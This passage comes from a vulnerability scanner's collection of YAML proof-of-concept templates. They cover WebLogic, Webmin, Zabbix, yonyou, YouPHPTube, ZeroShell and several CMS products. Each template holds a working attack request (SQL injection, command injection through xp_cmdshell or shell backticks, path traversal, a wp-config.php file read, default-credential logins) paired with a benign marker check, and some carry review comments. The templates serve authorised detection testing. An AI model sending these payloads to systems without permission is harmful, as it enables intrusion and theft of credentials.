j_username={{username}}&j_password={{password}}&j_character_encoding={{payload}} 26 | expression: | 27 | !response.body.bcontains(b"LoginForm.jsp") 28 | detail: 29 | author: shadown1ng(https://github.com/shadown1ng) -------------------------------------------------------------------------------- /src/plugins/pocs/weblogic-cve-2020-14750.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-weblogic-cve-2020-14750 2 | rules: 3 | - method: GET 4 | path: /console/images/%252E./console.portal 5 | follow_redirects: false 6 | expression: | 7 | response.status == 302 && (response.body.bcontains(bytes("/console/console.portal")) || response.body.bcontains(bytes("/console/jsp/common/NoJMX.jsp"))) 8 | detail: 
9 | author: canc3s(https://github.com/canc3s),Soveless(https://github.com/Soveless) 10 | weblogic_version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 11 | links: 12 | - https://www.oracle.com/security-alerts/alert-cve-2020-14750.html 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/weblogic-ssrf.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-weblogic-ssrf 2 | rules: 3 | - method: GET 4 | path: >- 5 | /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.1.1.1:700 6 | headers: 7 | Cookie: >- 8 | publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; 9 | follow_redirects: false 10 | expression: >- 11 | response.status == 200 && (response.body.bcontains(b"'127.1.1.1', port: '700'") || response.body.bcontains(b"Socket Closed")) 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/webmin-cve-2019-15107-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-webmin-cve-2019-15107-rce 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | url: request.url 6 | rules: 7 | - method: POST 8 | path: /password_change.cgi 9 | headers: 10 | Referer: "{{url}}" 11 | body: user=roovt&pam=&expired=2&old=expr%20{{r1}}%20%2b%20{{r2}}&new1=test2&new2=test2 12 | follow_redirects: false 13 | expression: > 14 | response.body.bcontains(bytes(string(r1 + r2))) 15 | detail: 16 | author: danta 17 | description: Webmin 远程命令执行漏洞(CVE-2019-15107) 18 | links: 19 | - https://github.com/vulhub/vulhub/tree/master/webmin/CVE-2019-15107 20 | 
-------------------------------------------------------------------------------- /src/plugins/pocs/weiphp-sql.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-weiphp-sql 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5({{rand}}),0x7e),1)--+ 7 | expression: 8 | response.body.bcontains(bytes(substr(md5(string(rand)), 0, 31))) 9 | detail: 10 | author: sakura404x 11 | version: Weiphp<=5.0 12 | links: 13 | - https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/wifisky-default-password-cnvd-2021-39012.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-wifisky-default-password-cnvd-2021-39012 2 | rules: 3 | - method: POST 4 | path: /login.php?action=login&type=admin 5 | follow_redirects: false 6 | body: >- 7 | username=admin&password=admin 8 | expression: | 9 | response.status == 200 && response.body.bcontains(b"{\"success\":\"true\", \"data\":{\"id\":1}, \"alert\":\"您正在使用默认密码登录,为保证设备安全,请立即修改密码\"}") 10 | detail: 11 | author: Print1n(http://print1n.top) 12 | links: 13 | - https://www.cnvd.org.cn/flaw/show/CNVD-2021-39012 -------------------------------------------------------------------------------- /src/plugins/pocs/wordpress-cve-2019-19985-infoleak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-wordpress-cve-2019-19985-infoleak 2 | rules: 3 | - method: GET 4 | path: "/wp-admin/admin.php?page=download_report&report=users&status=all" 5 | follow_redirects: false 6 | expression: > 7 | response.status == 200 && response.body.bcontains(b"Name,Email,Status,Created") && 
"(?i)filename=.*?.csv".bmatches(bytes(response.headers["Content-Disposition"])) 8 | detail: 9 | author: bufsnake(https://github.com/bufsnake) 10 | links: 11 | - https://www.exploit-db.com/exploits/48698 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/wordpress-ext-adaptive-images-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-wordpress-ext-adaptive-images-lfi 2 | rules: 3 | - method: GET 4 | path: >- 5 | /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php 6 | follow_redirects: false 7 | expression: > 8 | response.status == 200 && response.body.bcontains(b"DB_NAME") && response.body.bcontains(b"DB_USER") && response.body.bcontains(b"DB_PASSWORD") && response.body.bcontains(b"DB_HOST") 9 | detail: 10 | author: FiveAourThe(https://github.com/FiveAourThe) 11 | links: 12 | - https://www.anquanke.com/vul/id/1674598 13 | - https://github.com/security-kma/EXPLOITING-CVE-2019-14205 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/wuzhicms-v410-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-wuzhicms-v410-sqli 2 | rules: 3 | - method: GET 4 | path: >- 5 | /api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20 6 | follow_redirects: false 7 | expression: | 8 | response.status == 200 && response.body.bcontains(b"81dc9bdb52d04dc20036dbd8313ed05") && response.body.bcontains(b"sql_error:MySQL Query Error") 9 | detail: 10 | author: leezp 11 | Affected Version: "wuzhicms-v4.1.0" 12 | vuln_url: "/api/sms_check.php" 13 | links: 14 | - https://github.com/wuzhicms/wuzhicms/issues/184 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/xdcms-sql.yml: 
-------------------------------------------------------------------------------- 1 | name: poc-yaml-xdcms-sql 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: "/index.php?m=member&f=login_save" 8 | body: | 9 | username=dd' or extractvalue(0x0a,concat(0x0a,{{r1}}*{{r2}}))#&password=dd&submit=+%B5%C7+%C2%BC+ 10 | expression: | 11 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 12 | detail: 13 | author: amos1 14 | links: 15 | - https://www.uedbox.com/post/35188/ 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/xiuno-bbs-cvnd-2019-01348-reinstallation.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-xiuno-bbs-cvnd-2019-01348-reinstallation 2 | rules: 3 | - method: GET 4 | path: /install/ 5 | headers: 6 | Accept-Encoding: 'deflate' 7 | follow_redirects: false 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes(string("/view/js/xiuno.js"))) && response.body.bcontains(bytes(string("Choose Language (选择语言)"))) 10 | detail: 11 | author: 清风明月(www.secbook.info) 12 | influence_version: '=< Xiuno BBS 4.0.4' 13 | links: 14 | - https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/xunchi-cnvd-2020-23735-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-xunchi-cnvd-2020-23735-file-read 2 | rules: 3 | - method: GET 4 | path: /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php 5 | headers: 6 | Accept-Encoding: 'deflate' 7 | follow_redirects: false 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes(string("NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"))) && response.body.bcontains(bytes(string("display_errors"))) 10 | detail: 11 | 
author: 清风明月(www.secbook.info) 12 | influence_version: ' >= V2.3' 13 | links: 14 | - http://www.cnxunchi.com 15 | - https://www.cnvd.org.cn/flaw/show/2025171 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/yccms-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-yccms-rce 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | r1: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: GET 7 | path: "/admin/?a=Factory();print({{r}}%2b{{r1}});//../" 8 | expression: | 9 | response.body.bcontains(bytes(string(r + r1))) 10 | detail: 11 | author: j4ckzh0u(https://github.com/j4ckzh0u),violin 12 | yccms: v3.3 13 | links: 14 | - https://blog.csdn.net/qq_36374896/article/details/84839891 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/yonyou-grp-u8-sqli-to-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-yonyou-grp-u8-sqli-to-rce 2 | set: 3 | r1: randomInt(1000, 9999) 4 | r2: randomInt(1000, 9999) 5 | rules: 6 | - method: POST 7 | path: /Proxy 8 | follow_redirects: false 9 | body: | 10 | cVer=9.8.0&dp=XMLAS_DataRequestProviderNameDataSetProviderDataDataexec xp_cmdshell 'set/A {{r1}}*{{r2}}' 11 | expression: | 12 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 13 | detail: 14 | author: MrP01ntSun(https://github.com/MrPointSun) 15 | links: 16 | - https://www.hackbug.net/archives/111.html 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/yonyou-nc-bsh-servlet-bshservlet-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-yonyou-nc-bsh-servlet-bshservlet-rce 2 | set: 3 | r1: randomInt(8000, 9999) 4 | r2: randomInt(8000, 9999) 5 | rules: 6 | - method: POST 7 | path: /servlet/~ic/bsh.servlet.BshServlet 8 | body: 
bsh.script=print%28{{r1}}*{{r2}}%29%3B 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 11 | detail: 12 | author: B1anda0(https://github.com/B1anda0) 13 | links: 14 | - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/yonyou-u8-oa-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-yongyou-u8-oa-sqli 2 | set: 3 | rand: randomInt(200000000, 220000000) 4 | rules: 5 | - method: GET 6 | path: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}})) 7 | follow_redirects: false 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) 10 | 11 | detail: 12 | author: kzaopa(https://github.com/kzaopa) 13 | links: 14 | - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20OA%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/youphptube-encoder-cve-2019-5127.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-youphptube-encoder-cve-2019-5127 2 | set: 3 | fileName: randomLowercase(4) + ".txt" 4 | content: randomLowercase(8) 5 | payload: urlencode(base64("`echo " + content + " > " + fileName + "`")) 6 | rules: 7 | - method: GET 8 | path: /objects/getImage.php?base64Url={{payload}}&format=png 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 12 | - method: GET 13 | path: /objects/{{fileName}} 14 | follow_redirects: true 15 | expression: | 16 | response.status == 200 && response.body.bcontains(bytes(content)) 17 | detail: 18 | author: 0x_zmz(github.com/0x-zmz) 19 | links: 20 | - https://xz.aliyun.com/t/6708 21 | 
--------------------------------------------------------------------------------
/src/plugins/pocs/youphptube-encoder-cve-2019-5128.yml:
--------------------------------------------------------------------------------
# Vulnerability check for CVE-2019-5128 (YouPHPTube Encoder, getImageMP4.php).
# Rule 1 sends a base64Url parameter built from a random marker; rule 2 then
# fetches the random .txt file under /objects/ and requires it to contain the
# random content, so a match means the first request was actually executed.
# NOTE(review): on an affected host this check leaves a <random>.txt file in
# /objects/ - remove it after an authorised scan. For detection, a base64Url
# value that does not decode to a URL is the observable anomaly.
name: poc-yaml-youphptube-encoder-cve-2019-5128
set:
  fileName: randomLowercase(4) + ".txt"
  content: randomLowercase(8)
  payload: urlencode(base64("`echo " + content + " > " + fileName + "`"))
rules:
  - method: GET
    path: /objects/getImageMP4.php?base64Url={{payload}}&format=jpg
    follow_redirects: true
    expression: |
      response.status == 200
  - method: GET
    path: /objects/{{fileName}}
    follow_redirects: true
    expression: |
      response.status == 200 && response.body.bcontains(bytes(content))
detail:
  author: 0x_zmz(github.com/0x-zmz)
  links:
    - https://xz.aliyun.com/t/6708

--------------------------------------------------------------------------------
/src/plugins/pocs/youphptube-encoder-cve-2019-5129.yml:
--------------------------------------------------------------------------------
# Same two-step check as the CVE-2019-5128 template above, but the first
# request targets /objects/getSpiritsFromVideo.php instead of getImageMP4.php.
# The same marker-file clean-up note applies.
name: poc-yaml-youphptube-encoder-cve-2019-5129
set:
  fileName: randomLowercase(4) + ".txt"
  content: randomLowercase(8)
  payload: urlencode(base64("`echo " + content + " > " + fileName + "`"))
rules:
  - method: GET
    path: /objects/getSpiritsFromVideo.php?base64Url={{payload}}&format=jpg
    follow_redirects: true
    expression: |
      response.status == 200
  - method: GET
    path: /objects/{{fileName}}
    follow_redirects: true
    expression: |
      response.status == 200 && response.body.bcontains(bytes(content))
detail:
  author: 0x_zmz(github.com/0x-zmz)
  links:
    - https://xz.aliyun.com/t/6708

--------------------------------------------------------------------------------
/src/plugins/pocs/yungoucms-sqli.yml:
--------------------------------------------------------------------------------
# SQL injection check for YunGouCMS (member/cart/Fastpay, shopid parameter).
# A random integer is chosen per run and the response must contain md5(rand);
# matching on a per-run hash rather than a fixed string keeps cached or echoed
# pages from producing a false positive.
name: poc-yaml-yungoucms-sqli
set:
  rand: randomInt(2000000000, 2100000000)
rules:
  - method: GET
    path: >-
      /?/member/cart/Fastpay&shopid=-1%20union%20select%20md5({{rand}}),2,3,4%20--+
    follow_redirects: false
    expression: >
      response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
detail:
  author: cc_ci(https://github.com/cc8ci)
  links:
    - https://www.secquan.org/Prime/1069179
--------------------------------------------------------------------------------
/src/plugins/pocs/zabbix-authentication-bypass.yml:
--------------------------------------------------------------------------------
# Checks whether the Zabbix dashboard is served to an unauthenticated client:
# a 200 whose body contains both "Share" and "Dashboard". Presumably tied to an
# enabled guest account - confirm against the linked advisory before relying
# on the result. NOTE(review): bytes("Share") and b"Dashboard" are two
# spellings of the same byte-string comparison; kept as written.
name: poc-yaml-zabbix-authentication-bypass
rules:
  - method: GET
    path: /zabbix.php?action=dashboard.view&dashboardid=1
    follow_redirects: false
    expression: |
      response.status == 200 && response.body.bcontains(bytes("Share")) && response.body.bcontains(b"Dashboard")
detail:
  author: FiveAourThe(https://github.com/FiveAourThe)
  links:
    - https://www.exploit-db.com/exploits/47467
--------------------------------------------------------------------------------
/src/plugins/pocs/zabbix-cve-2016-10134-sqli.yml:
--------------------------------------------------------------------------------
# SQL injection check for CVE-2016-10134 (Zabbix jsrpc.php, profileIdx2).
# A random integer r is injected and the response must contain the first 31
# characters of md5(r); only 31 are compared, presumably because the error
# text that echoes the hash is truncated - verify against the linked write-up.
name: poc-yaml-zabbix-cve-2016-10134-sqli
set:
  r: randomInt(2000000000, 2100000000)
rules:
  - method: GET
    path: >-
      /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,md5({{r}})),0)
    follow_redirects: true
    expression: |
      response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r)), 0, 31)))
detail:
  author: sharecast
  links:
    - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134
--------------------------------------------------------------------------------
/src/plugins/pocs/zabbix-default-password.yml:
--------------------------------------------------------------------------------
# Default-credential check: posts the Admin / zabbix login documented in the
# linked Zabbix quickstart. Success is a 302 to the dashboard together with a
# zbx_session cookie. Mitigation is simply changing the Admin password after
# installation; a hit here is a configuration finding, not a software flaw.
name: poc-yaml-zabbix-default-password
rules:
  - method: POST
    path: /index.php
    body: name=Admin&password=zabbix&autologin=1&enter=Sign+in
    expression: |
      response.status == 302 && response.headers["Location"] == "zabbix.php?action=dashboard.view" && response.headers["set-cookie"].contains("zbx_session")
detail:
  author: fuzz7j(https://github.com/fuzz7j)
  links:
    - https://www.zabbix.com/documentation/3.4/zh/manual/quickstart/login

--------------------------------------------------------------------------------
/src/plugins/pocs/zcms-v3-sqli.yml:
--------------------------------------------------------------------------------
# Error-based SQL injection check for ZCMS v3 (admin/cms_channel.php, del
# parameter). Unlike the random-value templates in this directory, the
# injected value and the expected hash are both fixed constants, so a cached
# or previously probed page can reproduce the match - treat a hit as a lead
# that needs manual confirmation.
name: poc-yaml-zcms-v3-sqli
rules:
  - method: GET
    path: >-
      /admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b
    follow_redirects: true
    expression: |
      response.status == 200 && response.body.bcontains(b"6f7c6dcbc380aac3bcba1f9fccec991e")
detail:
  author: MaxSecurity(https://github.com/MaxSecurity)
  links:
    - https://www.anquanke.com/post/id/183241

--------------------------------------------------------------------------------
/src/plugins/pocs/zeit-nodejs-cve-2020-5284-directory-traversal.yml:
--------------------------------------------------------------------------------
# Directory traversal check for CVE-2020-5284 (Next.js static file serving).
# Success is a 200 JSON response whose body matches a pages-manifest "_app"
# entry. The traversal lives in the request path, so a proxy that normalises
# ".." before forwarding can mask an affected backend (false negative).
name: poc-yaml-zeit-nodejs-cve-2020-5284-directory-traversal
rules:
  - method: GET
    path: /_next/static/../server/pages-manifest.json
    expression: |
      response.status == 200 && response.headers["Content-Type"].contains("application/json") && "/_app\": \".*?_app\\.js".bmatches(response.body)
detail:
  author: x1n9Qi8
  links:
    - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202003-1728
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5284
--------------------------------------------------------------------------------
/src/plugins/pocs/zeroshell-cve-2019-12725-rce.yml:
--------------------------------------------------------------------------------
# Command execution check for CVE-2019-12725 (ZeroShell cgi-bin/kerbynet).
# Two random integers are chosen and the response must contain their
# difference, which only appears if the injected expr was evaluated; using a
# computed value instead of a fixed marker avoids false positives.
# Note: the description field below is kept in its original language; it
# reads "ZeroShell 3.9.0 remote command execution - CVE-2019-12725".
name: poc-yaml-zeroshell-cve-2019-12725-rce
set:
  r1: randomInt(800000000, 1000000000)
  r2: randomInt(800000000, 1000000000)
rules:
  - method: GET
    path: /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aexpr%20{{r1}}%20-%20{{r2}}%0A%27
    follow_redirects: false
    expression: |
      response.status == 200 && response.body.bcontains(bytes(string(r1 - r2)))

detail:
  author: YekkoY
  description: "ZeroShell 3.9.0-远程命令执行漏洞-CVE-2019-12725"
  links:
    - http://wiki.xypbk.com/IOT%E5%AE%89%E5%85%A8/ZeroShell/ZeroShell%203.9.0%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2019-12725.md?btwaf=51546333

--------------------------------------------------------------------------------
